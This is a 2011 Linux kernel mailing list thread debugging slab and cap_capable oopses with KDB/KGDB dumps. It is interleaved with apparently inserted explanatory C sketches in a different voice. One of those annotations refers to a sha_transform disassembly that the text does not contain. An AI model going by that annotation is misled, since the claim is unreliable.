* Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
@ 2011-05-23 14:48 Robert Święcki
       [not found] ` <BANLkTikey3L4doiHY=__=690TZNsXqRHUQ@mail.gmail.com>
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-23 14:48 UTC (permalink / raw)
  To: linux-kernel

Happens under 2.6.39-rc4.

Here's a probably more readable version (without the lines being wrapped):
http://alt.swiecki.net/linux_kernel/sys_open-kmem_cache_alloc-2.6.39-rc4.txt

The most interesting part is probably the KGDB one. I'm still
debugging, but in case others might figure it out faster, attaching my
analysis here. The initial observation is that values in 'filp_cachep'
are incorrect.

============================================================================
KDB:
============================================================================

Stack traceback for pid 11235
0xffff88011ae91720    11235    11878  1    1   R  0xffff88011ae91ba0 *killall
<c> ffff88011ae1dd48<c> 0000000000000018<c> ffffffff8111ed78<c>
ffff88012bc4e280<c>
<c> ffff88012bffbe00<c> 0000000000000001<c> ffff88011ae1de48<c>
ffff880107947900<c>
<c> 0000000000000001<c> ffff88011ae1df28<c> ffff88010374e000<c>
ffff88011ae1dda8<c>
Call Trace:
 [<ffffffff8111ed78>] ? release_pages+0x16f/0x181
 [<ffffffff81162e5f>] ? get_empty_filp+0x6b/0x11f
 [<ffffffff8116cca7>] ? path_openat+0x33/0x345
 [<ffffffff8116cff1>] ? do_filp_open+0x38/0x86
 [<ffffffff8108a703>] ? get_parent_ip+0x11/0x41
 [<ffffffff8108a703>] ? get_parent_ip+0x11/0x41
 [<ffffffff8108a87c>] ? sub_preempt_count+0x97/0xaa
 [<ffffffff81ed24cd>] ? _raw_spin_unlock+0x2d/0x38
 [<ffffffff811781a1>] ? alloc_fd+0x10b/0x11d
 [<ffffffff8116127b>] ? do_sys_open+0x6e/0x100
 [<ffffffff8116132d>] ? sys_open+0x20/0x22
 [<ffffffff81ed3582>] ? system_call_fastpath+0x16/0x1b

---> *killall

sysname    Linux
release    2.6.39-rc4
version    #2 SMP PREEMPT Tue May 10 20:39:51 CEST 2011
machine    x86_64
nodename   ise-test
domainname (none)
ccversion  CCVERSION
date       2011-05-22 07:01:01 tz_minuteswest -120
uptime     11 days 12:13
load avg   19.87 22.44 23.24

MemTotal:         993069 kB
MemFree:          130318 kB
Buffers:           44686 kB


<1>[994415.765292] BUG: unable to handle kernel paging request at
00000000ffffffff
<1>[994415.766002] IP: [<ffffffff81150e83>] kmem_cache_alloc+0x57/0xe7
<4>[994415.766002] PGD 10a3ba067 PUD 0
<0>[994415.766002] Oops: 0000 [#1] PREEMPT SMP
<0>[994415.766002] last sysfs file:
/sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
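
For readers decoding the "Oops: 0000" line: on x86 the number is the page-fault error code in hex. The sketch below decodes the architectural bits. The names (pf_info, decode_pf_error, the PF_* constants) are illustrative, not the kernel's own identifiers.

```c
#include <stdbool.h>

/* x86 page-fault error code bits (architectural). Names are illustrative. */
enum {
	PF_PRESENT = 1 << 0,	/* 0: page not present, 1: protection violation */
	PF_WRITE   = 1 << 1,	/* 0: read access, 1: write access */
	PF_USER    = 1 << 2,	/* 0: CPU was in kernel mode, 1: user mode */
	PF_RSVD    = 1 << 3,	/* reserved bit set in a paging entry */
	PF_INSTR   = 1 << 4,	/* fault was an instruction fetch */
};

struct pf_info {
	bool present, write, user, rsvd, instr;
};

/* Split an error code, as printed after "Oops:", into its flags. */
static struct pf_info decode_pf_error(unsigned long code)
{
	struct pf_info i;

	i.present = (code & PF_PRESENT) != 0;
	i.write   = (code & PF_WRITE) != 0;
	i.user    = (code & PF_USER) != 0;
	i.rsvd    = (code & PF_RSVD) != 0;
	i.instr   = (code & PF_INSTR) != 0;
	return i;
}
```

decode_pf_error(0x0000) leaves every flag clear, i.e. a read of a not-present page while the CPU was in kernel mode. That matches the "PUD 0" line and the load instruction reported as the trapping instruction.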


Entering kdb (current=0xffff88011ae91720, pid 11235) on processor 1
due to cpu switch
[1]kdb> rd
ax: 0000000000000000  bx: ffff88011ae1de48  cx: ffff88011ae1df28
dx: 0000006c68931281  si: 0000006c68931281  di: ffffffff81162e5f
bp: ffff88011ae1dd88  sp: ffff88011ae1dd48  r8: 0000000000000041
r9: ffff88012074fa50  r10: 0000000000000000  r11: 0000000000000246
r12: 00000000ffffffff  r13: ffff88012b002300  r14: 00000000000080d0
r15: ffff88010374e000  ip: ffffffff81150e83  flags: 00010206  cs: 00000010
ss: 00000018

Code: 00 48 8b 50 08 4c 8b 20 4d 85 e4 75 16 48 89 f9 83 ca ff 44 89
f6 4c 89 ef e8 b0 fa ff ff 49 89 c4 eb 20 49 63 45 20 49 8b 75 00 <49>
8b 1c 04 48 8d 4a 40 4c 89 e0 65 48 0f c7 0e 0f 94 c0 90 84
All code
========
   0:	00 48 8b             	add    %cl,-0x75(%rax)
   3:	50                   	push   %rax
   4:	08 4c 8b 20          	or     %cl,0x20(%rbx,%rcx,4)
   8:	4d 85 e4             	test   %r12,%r12
   b:	75 16                	jne    0x23
   d:	48 89 f9             	mov    %rdi,%rcx
  10:	83 ca ff             	or     $0xffffffffffffffff,%edx
  13:	44 89 f6             	mov    %r14d,%esi
  16:	4c 89 ef             	mov    %r13,%rdi
  19:	e8 b0 fa ff ff       	callq  0xffffffffffffface
  1e:	49 89 c4             	mov    %rax,%r12
  21:	eb 20                	jmp    0x43
  23:	49 63 45 20          	movslq 0x20(%r13),%rax
  27:	49 8b 75 00          	mov    0x0(%r13),%rsi
  2b:*	49 8b 1c 04          	mov    (%r12,%rax,1),%rbx     <-- trapping instruction
  2f:	48 8d 4a 40          	lea    0x40(%rdx),%rcx
  33:	4c 89 e0             	mov    %r12,%rax
  36:	65 48 0f c7 0e       	cmpxchg16b %gs:(%rsi)
  3b:	0f 94 c0             	sete   %al
  3e:	90                   	nop
  3f:	84                   	.byte 0x84

Code starting with the faulting instruction
===========================================
   0:	49 8b 1c 04          	mov    (%r12,%rax,1),%rbx
   4:	48 8d 4a 40          	lea    0x40(%rdx),%rcx
   8:	4c 89 e0             	mov    %r12,%rax
   b:	65 48 0f c7 0e       	cmpxchg16b %gs:(%rsi)
  10:	0f 94 c0             	sete   %al
  13:	90                   	nop
  14:	84                   	.byte 0x84






============================================================================
GDB:
============================================================================
(gdb) disassemble 0xffffffff81150e83
Dump of assembler code for function kmem_cache_alloc:
   0xffffffff81150e2c <+0>:	push   rbp
   0xffffffff81150e2d <+1>:	mov    rbp,rsp
   0xffffffff81150e30 <+4>:	push   r15
   0xffffffff81150e32 <+6>:	push   r14
   0xffffffff81150e34 <+8>:	push   r13
   0xffffffff81150e36 <+10>:	push   r12
   0xffffffff81150e38 <+12>:	push   rbx
   0xffffffff81150e39 <+13>:	sub    rsp,0x18
   0xffffffff81150e3d <+17>:	call   0xffffffff81ed32c0
   0xffffffff81150e42 <+22>:	mov    r13,rdi
   0xffffffff81150e45 <+25>:	mov    r14d,esi
   0xffffffff81150e48 <+28>:	mov    rdi,QWORD PTR [rbp+0x8]
   0xffffffff81150e4c <+32>:	mov    rax,QWORD PTR [r13+0x0]
   0xffffffff81150e50 <+36>:	add    rax,QWORD PTR gs:0xdd40
   0xffffffff81150e59 <+45>:	mov    rdx,QWORD PTR [rax+0x8]
   0xffffffff81150e5d <+49>:	mov    r12,QWORD PTR [rax]
   0xffffffff81150e60 <+52>:	test   r12,r12
   0xffffffff81150e63 <+55>:	jne    0xffffffff81150e7b <kmem_cache_alloc+79>
   0xffffffff81150e65 <+57>:	mov    rcx,rdi
   0xffffffff81150e68 <+60>:	or     edx,0xffffffffffffffff
   0xffffffff81150e6b <+63>:	mov    esi,r14d
   0xffffffff81150e6e <+66>:	mov    rdi,r13
   0xffffffff81150e71 <+69>:	call   0xffffffff81150926 <__slab_alloc>
   0xffffffff81150e76 <+74>:	mov    r12,rax
   0xffffffff81150e79 <+77>:	jmp    0xffffffff81150e9b <kmem_cache_alloc+111>
   0xffffffff81150e7b <+79>:	movsxd rax,DWORD PTR [r13+0x20]
   0xffffffff81150e7f <+83>:	mov    rsi,QWORD PTR [r13+0x0]
   0xffffffff81150e83 <+87>:	mov    rbx,QWORD PTR [r12+rax*1]
   0xffffffff81150e87 <+91>:	lea    rcx,[rdx+0x40]
   0xffffffff81150e8b <+95>:	mov    rax,r12
   0xffffffff81150e8e <+98>:	call   0xffffffff813d2c70
   0xffffffff81150e93 <+103>:	nop    DWORD PTR [rax+0x0]
   0xffffffff81150e97 <+107>:	test   al,al
   0xffffffff81150e99 <+109>:	je     0xffffffff81150e4c <kmem_cache_alloc+32>
   0xffffffff81150e9b <+111>:	test   r12,r12
   0xffffffff81150e9e <+114>:	je     0xffffffff81150eb4 <kmem_cache_alloc+136>
   0xffffffff81150ea0 <+116>:	test   r14d,0x8000
   0xffffffff81150ea7 <+123>:	je     0xffffffff81150eb4 <kmem_cache_alloc+136>
   0xffffffff81150ea9 <+125>:	movsxd rcx,DWORD PTR [r13+0x1c]
   0xffffffff81150ead <+129>:	xor    eax,eax
   0xffffffff81150eaf <+131>:	mov    rdi,r12
   0xffffffff81150eb2 <+134>:	rep stos BYTE PTR es:[rdi],al
   0xffffffff81150eb4 <+136>:	movsxd rax,DWORD PTR [r13+0x18]
   0xffffffff81150eb8 <+140>:	movsxd r15,DWORD PTR [r13+0x1c]
   0xffffffff81150ebc <+144>:	mov    QWORD PTR [rbp-0x38],rax
   0xffffffff81150ec0 <+148>:	mov    r13,QWORD PTR [rbp+0x8]
   0xffffffff81150ec4 <+152>:	jmp    0xffffffff81150ec9 <kmem_cache_alloc+157>
   0xffffffff81150ec9 <+157>:	jmp    0xffffffff81150f01 <kmem_cache_alloc+213>
   0xffffffff81150ecb <+159>:	call   0xffffffff8114dacf <rcu_read_lock_sched_notrace>
   0xffffffff81150ed0 <+164>:	mov    rbx,QWORD PTR [rip+0x1abdfc9]        # 0xffffffff82c0eea0
   0xffffffff81150ed7 <+171>:	test   rbx,rbx
   0xffffffff81150eda <+174>:	je     0xffffffff81150efc <kmem_cache_alloc+208>
   0xffffffff81150edc <+176>:	mov    rdi,QWORD PTR [rbx+0x8]
   0xffffffff81150ee0 <+180>:	mov    r9d,r14d
   0xffffffff81150ee3 <+183>:	mov    r8,QWORD PTR [rbp-0x38]
   0xffffffff81150ee7 <+187>:	mov    rcx,r15
   0xffffffff81150eea <+190>:	mov    rdx,r12
   0xffffffff81150eed <+193>:	mov    rsi,r13
   0xffffffff81150ef0 <+196>:	call   QWORD PTR [rbx]
   0xffffffff81150ef2 <+198>:	add    rbx,0x10
   0xffffffff81150ef6 <+202>:	cmp    QWORD PTR [rbx],0x0
   0xffffffff81150efa <+206>:	jmp    0xffffffff81150eda <kmem_cache_alloc+174>
   0xffffffff81150efc <+208>:	call   0xffffffff81150cb1 <rcu_read_unlock_sched_notrace>
   0xffffffff81150f01 <+213>:	add    rsp,0x18
   0xffffffff81150f05 <+217>:	mov    rax,r12
   0xffffffff81150f08 <+220>:	pop    rbx
   0xffffffff81150f09 <+221>:	pop    r12
   0xffffffff81150f0b <+223>:	pop    r13
   0xffffffff81150f0d <+225>:	pop    r14
   0xffffffff81150f0f <+227>:	pop    r15
   0xffffffff81150f11 <+229>:	leave
   0xffffffff81150f12 <+230>:	ret
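
The oops reports the faulting IP as kmem_cache_alloc+0x57/0xe7, i.e. offset/size relative to the symbol. A minimal sketch of checking that notation against the disassembly above; sym_ref and the helper names are made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* One "symbol+offset/size" reference as printed in an oops. */
struct sym_ref {
	uint64_t base;		/* address of the first instruction of the symbol */
	uint64_t offset;	/* the value after '+' */
	uint64_t size;		/* the value after '/' */
};

/* Absolute address the reference points at. */
static uint64_t sym_to_addr(struct sym_ref r)
{
	return r.base + r.offset;
}

/* A sane reference has its offset inside the function body. */
static bool offset_in_function(struct sym_ref r)
{
	return r.offset < r.size;
}
```

With base 0xffffffff81150e2c (the <+0> line), offset 0x57 and size 0xe7, sym_to_addr() gives 0xffffffff81150e83, the IP from the oops. base + size is 0xffffffff81150f13, one byte past the final ret at <+230>.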







============================================================================
KGDB:
============================================================================

(gdb) set remotebaud 115200
(gdb)  target remote /dev/ttyS0
Remote debugging using /dev/ttyS0
0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
1943			if (unlikely(!this_cpu_cmpxchg_double(
(gdb) bt
#0  0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
#1  kmem_cache_alloc (s=0xffff88012b002300, gfpflags=32976) at mm/slub.c:1971
#2  0xffffffff81162e5f in kmem_cache_zalloc () at include/linux/slab.h:310
#3  get_empty_filp () at fs/file_table.c:123
#4  0xffffffff8116cca7 in path_openat (dfd=<value optimized out>,
pathname=0xffff88010374e000 "/proc/1133/stat",
    nd=0xffff88011ae1de48, op=0xffff88011ae1df28, flags=<value
optimized out>) at fs/namei.c:2324
#5  0xffffffff8116cff1 in do_filp_open (dfd=-100,
pathname=0xffff88010374e000 "/proc/1133/stat",
    op=0xffff88011ae1df28, flags=1) at fs/namei.c:2380
#6  0xffffffff8116127b in do_sys_open (dfd=-100, filename=<value
optimized out>, flags=32768,
    mode=<value optimized out>) at fs/open.c:1001
#7  0xffffffff8116132d in sys_open (filename=<value optimized out>,
flags=<value optimized out>,
    mode=<value optimized out>) at fs/open.c:1022
#8  <signal handler called>
#9  0x00007f17ee73bff0 in __brk_reservation_fn_dmi_alloc__ ()
#10 0xffff880101141720 in __brk_reservation_fn_dmi_alloc__ ()
#11 0xffffffff82a1bb50 in ?? ()
#12 0x0000000200020000 in __brk_reservation_fn_dmi_alloc__ ()
#13 0x0000000300000001 in __brk_reservation_fn_dmi_alloc__ ()
#14 0x00007ffffffff000 in __brk_reservation_fn_dmi_alloc__ ()
#15 0xffffffff810a4b51 in sys_restart_syscall () at kernel/signal.c:2085
#16 0x0000000000000000 in ?? ()

(gdb) frame 0
#0  0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
1943			if (unlikely(!this_cpu_cmpxchg_double(
(gdb) list
1938			 * 3. If they were not changed replace tid and freelist
1939			 *
1940			 * Since this is without lock semantics the protection is only against
1941			 * code executing on this cpu *not* from access by other cpus.
1942			 */
1943			if (unlikely(!this_cpu_cmpxchg_double(
1944					s->cpu_slab->freelist, s->cpu_slab->tid,
1945					object, tid,
1946					get_freepointer(s, object), next_tid(tid)))) {
1947	
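
The comment in the listing describes replacing (freelist, tid) only if neither has changed. A minimal single-threaded sketch of that compare-and-swap-pair semantics follows. It is NOT atomic and is not the kernel's this_cpu_cmpxchg_double(). All names ending in _sketch are hypothetical, and the step 0x40 is only what the "lea rcx,[rdx+0x40]" in the disassembly suggests for this build.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed from "lea rcx,[rdx+0x40]" in this build; not a general constant. */
#define TID_STEP_SKETCH 0x40ULL

/* Just the two per-CPU fields the fast path swaps as a pair. */
struct cpu_slab_sketch {
	void *freelist;
	uint64_t tid;
};

static uint64_t next_tid_sketch(uint64_t tid)
{
	return tid + TID_STEP_SKETCH;
}

/*
 * Replace (freelist, tid) with the new pair only if both still hold the
 * expected old values. Plain C, so no atomicity: this only illustrates
 * the success/failure logic.
 */
static bool cmpxchg_double_sketch(struct cpu_slab_sketch *c,
				  void *old_free, uint64_t old_tid,
				  void *new_free, uint64_t new_tid)
{
	if (c->freelist != old_free || c->tid != old_tid)
		return false;	/* something changed: caller retries */
	c->freelist = new_free;
	c->tid = new_tid;
	return true;
}
```

The new freelist value comes from get_freepointer(s, object), which has to read through 'object' before the swap is attempted. That read is where a bogus 'object' faults, before the compare can reject anything.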

(gdb) x/i $pc
=> 0xffffffff81150e83 <kmem_cache_alloc+87>:	mov    rbx,QWORD PTR [r12+rax*1]

(gdb) info registers
rax            0x0	0
rbx            0xffff88011ae1de48	-131936649355704
rcx            0xffff88011ae1df28	-131936649355480
rdx            0x6c68931281	465610936961
rsi            0x6c68931281	465610936961
rdi            0xffffffff81162e5f	-2129252769
rbp            0xffff88011ae1dd88	0xffff88011ae1dd88
rsp            0xffff88011ae1dd48	0xffff88011ae1dd48
r8             0x41	65
r9             0xffff88012074fa50	-131936555828656
r10            0x0	0
r11            0x246	582
r12            0xffffffff	4294967295
r13            0xffff88012b002300	-131936378936576
r14            0x80d0	32976
r15            0xffff88010374e000	-131937042374656
rip            0xffffffff81150e83	0xffffffff81150e83 <kmem_cache_alloc+87>
eflags         0x10206	[ PF IF RF ]
cs             0x10	16
ss             0x18	24
ds             Could not fetch register "ds"; remote failure reply 'E22'

(gdb) p object
$36 = (void **) 0xffffffff
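
To tie the register dump to the fault address: the trapping load is "mov rbx,[r12+rax*1]", where r12 holds 'object' and rax holds the sign-extended value loaded from [r13+0x20], which lines up with the 'offset' field in the struct dump. A small sketch of that address computation; the function name is made up.

```c
#include <stdint.h>

/*
 * Address read by the free-pointer load: object + offset.
 * The offset is sign-extended first, as movsxd does in the disassembly.
 */
static uint64_t freepointer_load_addr(uint64_t object, int32_t offset)
{
	return object + (uint64_t)(int64_t)offset;
}
```

With object = 0xffffffff and offset = 0 this gives 0x00000000ffffffff, the address in the "unable to handle kernel paging request" line.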

(gdb) p s
$1 = (struct kmem_cache *) 0xffff88012b002300
(gdb) p s->cpu_slab
$2 = (struct kmem_cache_cpu *) 0x15300

(gdb) p *s
$17 = {cpu_slab = 0x15300, flags = 0, min_partial = 7, size = 192,
objsize = 192, offset = 0, oo = {x = 21}, max = {
    x = 21}, min = {x = 21}, allocflags = 0, refcount = 13, ctor = 0,
inuse = 192, align = 8, reserved = 0,
  name = 0xffff88012b000010 "kmalloc-192", list = {next =
0xffff88012b002268, prev = 0xffff88012b002468}, kobj = {
    name = 0xffff880123c7c830 ":t-0000192", entry = {next =
0xffff88012b002280, prev = 0xffff88012b002480},
    parent = 0xffff8801249a74f8, kset = 0xffff8801249a74e0, ktype =
0xffffffff82a37790, sd = 0xffff880123ca6fa0,
    kref = {refcount = {counter = 1}}, state_initialized = 1,
state_in_sysfs = 1, state_add_uevent_sent = 1,
    state_remove_uevent_sent = 0, uevent_suppress = 0},
remote_node_defrag_ratio = 1000, node = {0xffff88012b0010c0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15320, 0x0, 0x5, 0x800000008,
0x0, 0x200, 0x200, 0x200, 0x100000000, 0x0,
    0x800000008, 0x0, 0xffff88012b000020, 0xffff88012b002368,
0xffff88012b002568, 0xffff880123c7c800,
    0xffff88012b002380, 0xffff88012b002580, 0xffff8801249a74f8,
0xffff8801249a74e0, 0xffffffff82a37790,
    0xffff880123ca65f0, 0x700000001, 0x3e8, 0xffff88012b001100, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15340, 0x0, 0x5,
    0x1000000010, 0x0, 0x100, 0x100, 0x100, 0x500000000, 0x0,
0x800000010, 0x0, 0xffff88012b000030,
    0xffff88012b002468, 0xffff88012b002668, 0xffff880123c7c7d0,
0xffff88012b002480, 0xffff88012b002680,
    0xffff8801249a74f8, 0xffff8801249a74e0, 0xffffffff82a37790,
0xffff880123ca5c30, 0x700000001, 0x3e8}}

(gdb) p/x tid
$20 = 0x6c68931281

(gdb) up
#1  kmem_cache_alloc (s=0xffff88012b002300, gfpflags=32976) at mm/slub.c:1971
1971		void *ret = slab_alloc(s, gfpflags, NUMA_NO_NODE, _RET_IP_);
(gdb) up
#2  0xffffffff81162e5f in kmem_cache_zalloc () at include/linux/slab.h:310
310		return kmem_cache_alloc(k, flags | __GFP_ZERO);
(gdb) up
#3  get_empty_filp () at fs/file_table.c:123
123		f = kmem_cache_zalloc(filp_cachep, GFP_KERNEL);
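
A note on gfpflags=32976 seen in frames #0 and #1: that is 0x80d0. The disassembly tests r14d against 0x8000 before the "rep stos", which fits the "flags | __GFP_ZERO" in slab.h:310. A hedged sketch of splitting the value; the macro below is named after what the bit appears to be in this build, and its value is taken from the disassembly, not from a header.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bit tested by "test r14d,0x8000" in this build; assumed to be __GFP_ZERO. */
#define SKETCH_GFP_ZERO 0x8000u

/* True if the allocation asks for zeroed memory. */
static bool wants_zeroing(uint32_t gfpflags)
{
	return (gfpflags & SKETCH_GFP_ZERO) != 0;
}

/* Flags as the caller passed them, before the zeroing bit was OR-ed in. */
static uint32_t without_zero(uint32_t gfpflags)
{
	return gfpflags & ~SKETCH_GFP_ZERO;
}
```

For 32976 this leaves 0xd0, which would be the GFP_KERNEL that get_empty_filp() passes, assuming the flag encoding of this kernel version.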

(gdb) p filp_cachep             (/note/ filp_cachep == 's' from slab_alloc())
$37 = (struct kmem_cache *) 0xffff88012b002300
(gdb) p *filp_cachep
$38 = {cpu_slab = 0x15300, flags = 0, min_partial = 7, size = 192,
objsize = 192, offset = 0, oo = {x = 21}, max = {
    x = 21}, min = {x = 21}, allocflags = 0, refcount = 13, ctor = 0,
inuse = 192, align = 8, reserved = 0,
  name = 0xffff88012b000010 "kmalloc-192", list = {next =
0xffff88012b002268, prev = 0xffff88012b002468}, kobj = {
    name = 0xffff880123c7c830 ":t-0000192", entry = {next =
0xffff88012b002280, prev = 0xffff88012b002480},
    parent = 0xffff8801249a74f8, kset = 0xffff8801249a74e0, ktype =
0xffffffff82a37790, sd = 0xffff880123ca6fa0,
    kref = {refcount = {counter = 1}}, state_initialized = 1,
state_in_sysfs = 1, state_add_uevent_sent = 1,
    state_remove_uevent_sent = 0, uevent_suppress = 0},
remote_node_defrag_ratio = 1000, node = {0xffff88012b0010c0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15320, 0x0, 0x5, 0x800000008,
0x0, 0x200, 0x200, 0x200, 0x100000000, 0x0,
    0x800000008, 0x0, 0xffff88012b000020, 0xffff88012b002368,
0xffff88012b002568, 0xffff880123c7c800,
    0xffff88012b002380, 0xffff88012b002580, 0xffff8801249a74f8,
0xffff8801249a74e0, 0xffffffff82a37790,
    0xffff880123ca65f0, 0x700000001, 0x3e8, 0xffff88012b001100, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15340, 0x0, 0x5,
    0x1000000010, 0x0, 0x100, 0x100, 0x100, 0x500000000, 0x0,
0x800000010, 0x0, 0xffff88012b000030,
    0xffff88012b002468, 0xffff88012b002668, 0xffff880123c7c7d0,
0xffff88012b002480, 0xffff88012b002680,
    0xffff8801249a74f8, 0xffff8801249a74e0, 0xffffffff82a37790,
0xffff880123ca5c30, 0x700000001, 0x3e8}}

(gdb) p *cred  (it's 'killall' running from uid 0)
$46 = {usage = {counter = 116}, uid = 0, gid = 0, suid = 0, sgid = 0,
euid = 0, egid = 0, fsuid = 0, fsgid = 0,
  securebits = 0, cap_inheritable = {cap = {0, 0}}, cap_permitted =
{cap = {4294967295, 4294967295}}, cap_effective = {
    cap = {4294967295, 4294967295}}, cap_bset = {cap = {4294967295,
4294967295}}, jit_keyring = 0 '\000',
  thread_keyring = 0x0, request_key_auth = 0x0, tgcred =
0xffff88011c49f040, security = 0xffff8801076cc0c0,
  user = 0xffffffff82a21b20, group_info = 0xffff88009fb61540, rcu =
{next = 0x0, func = 0}}

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
       [not found]   ` <alpine.DEB.2.00.1105231133580.29047@router.home>
@ 2011-05-23 18:28     ` Robert Święcki
  2011-05-24 19:52       ` Robert Święcki
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-23 18:28 UTC (permalink / raw)
  To: linux-kernel; +Cc: Christoph Lameter

On Mon, May 23, 2011 at 6:35 PM, Christoph Lameter <cl@linux.com> wrote:
> On Mon, 23 May 2011, Robert Święcki wrote:
>
>> Hi, not sure if it's related to SLUB, in any case forwarding.
>
> Please reboot with the kernel parameter slub_debug or enable
> CONFIG_SLUB_DEBUG_ON. The kernel will then verify all operations of the
> users of the allocator and log important issues to the syslog. This is
> likely some memory corruption.

So, I ran it with CONFIG_SLUB_DEBUG_ON and got an Oops in just under a
second. Probably the important difference is that I ran 2.6.39 instead
of 2.6.39-rc4.

It was

<1>[   77.662935] BUG: unable to handle kernel NULL pointer
dereference at 0000000000000408
<1>[   77.663002] IP: [<ffffffff8134cbdf>] cap_capable+0x18/0x67
<4>[   77.663002] PGD 120428067 PUD 120e35067 PMD 0
<0>[   77.663002] Oops: 0000 [#1] PREEMPT SMP
<0>[   77.680925] last sysfs file:
/sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map

and kdb's backtrace shows:

[1]kdb> bt
Stack traceback for pid 8419
0xffff880120e3aee0     8419     8418  1    1   R  0xffff880120e3b360 *iknowthis2
<c> ffff88011f57deb8<c> 0000000000000000<c> ffff88011f5731a0<c>
ffff88011f57def8<c>
<c> ffffffff81378bfb<c> ffff88011f57ded8<c> ffff880120e3aee0<c>
0000000000000604<c>
<c> ffff88011f540500<c> 0000000000000000<c> 0000000000000000<c>
ffff88011f57df08<c>
Call Trace:
 [<ffffffff81378bfb>] ? apparmor_capable+0x27/0x61
 [<ffffffff8134d932>] ? security_capable+0x2a/0x2c
 [<ffffffff8109d99d>] ? ns_capable+0x3a/0x4f
 [<ffffffff8109da2b>] ? nsown_capable+0x24/0x29
 [<ffffffff810a6695>] ? sys_setgid+0x43/0x8d
 [<ffffffff810c1e11>] ? sys_setgid16+0x1c/0x1e
 [<ffffffff81ed6183>] ? ia32_do_call+0x13/0x13

and kgdb shows

(gdb) target remote /dev/ttyS0
Remote debugging using /dev/ttyS0
0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
88			if (targ_ns != &init_user_ns && targ_ns->creator == cred->user)

(gdb) p cred
$1 = (const struct cred *) 0x0

(gdb) bt
#0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
#1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
security/apparmor/lsm.c:144
#2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
cred=<value optimized out>, cap=<value optimized out>) at
security/security.c:160
#3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
cap=<value optimized out>) at kernel/capability.c:381
#4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
kernel/capability.c:412
#5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
#6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
kernel/uid16.c:53
#7  <signal handler called>
#8  0x0000000008065952 in __brk_reservation_fn_dmi_alloc__ ()

I looked through apparmor_capable() and cap_capable(), and there's
nothing that could change the value of 'cred' from 0xffff88011f540500
to 0 between apparmor_capable() and cap_capable() (i.e. no functions
that could cause a buffer overflow, in fact no function calls or
interesting operations at all).

Out of curiosity I looked at what runs on the other CPU, and it was:

[0]kdb> bt
Stack traceback for pid 23087
0xffff880120df8000    23087    16945  1    0   R  0xffff880120df8480 *iknowthis
<c> ffff880120d61c58<c> 0000000000000018<c>
Call Trace:
 <NMI>  <<EOE>>  [<ffffffff814feb2d>] ? extract_buf+0x5e/0x105
 [<ffffffff81ed3f85>] ? retint_restore_args+0x13/0x13
 [<ffffffff814fee11>] ? extract_entropy_user+0xb5/0x124
 [<ffffffff814fee95>] ? urandom_read+0x15/0x17
 [<ffffffff8116200b>] ? vfs_read+0xa9/0xfc
 [<ffffffff811633f5>] ? fget_light+0x42/0xa2
 [<ffffffff811622a6>] ? sys_read+0x4a/0x6e
 [<ffffffff81ed4902>] ? system_call_fastpath+0x16/0x1b

It's very strange, because in the first case (the problem with SLUB)
the second CPU was also stuck in this routine, and I'm fairly certain
it is the real cause of the problem (does it overwrite another CPU's
stack?). My config is here:
http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt

So the question is: could somebody more familiar with kernel
internals look into the /dev/urandom sys_read routines? I think they
don't play nicely with an SMP PREEMPT kernel (or maybe it just runs
out of kernel stack in there and overwrites another one). Some more
data about the second thread:

(gdb) thread 1
[Switching to thread 1 (Thread 23087)]#0  sha_transform
(digest=0xffff880120d61de8,
    in=0xffff880120d61ca8
"\372\223;4<;\030L\351\331_\345lI\206\362\202\364\373J\277\337\231ӌ!_(\206^\267\366\311\306\061R\001\v\b\322\312ګ\301\334:V\314p\226\253@\332m\206\271\025\361-\255f\027\340",
<incomplete sequence \364>, W=0xffff880120d61ca8) at lib/sha1.c:47
47			W[i+16] = rol32(W[i+13] ^ W[i+8] ^ W[i+2] ^ W[i], 1);
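
For reference, line 47 of lib/sha1.c is the SHA-1 message-schedule expansion. Below is a standalone sketch of that loop, assuming an 80-word W array; the _sketch names are made up and this is not the kernel source. The sha_transform disassembly in this mail shows "ror eax,0x1f", which is the same operation as a rotate left by 1.

```c
#include <stdint.h>

/* Rotate left / right on 32 bits; the shift counts are masked to stay defined. */
static uint32_t rol32_sketch(uint32_t w, unsigned int s)
{
	return (w << (s & 31)) | (w >> ((32 - s) & 31));
}

static uint32_t ror32_sketch(uint32_t w, unsigned int s)
{
	return (w >> (s & 31)) | (w << ((32 - s) & 31));
}

/* Expand the first 16 words of W into all 80, as the quoted line does. */
static void sha1_expand_sketch(uint32_t W[80])
{
	int i;

	for (i = 0; i < 64; i++)
		W[i + 16] = rol32_sketch(W[i + 13] ^ W[i + 8] ^ W[i + 2] ^ W[i], 1);
}
```

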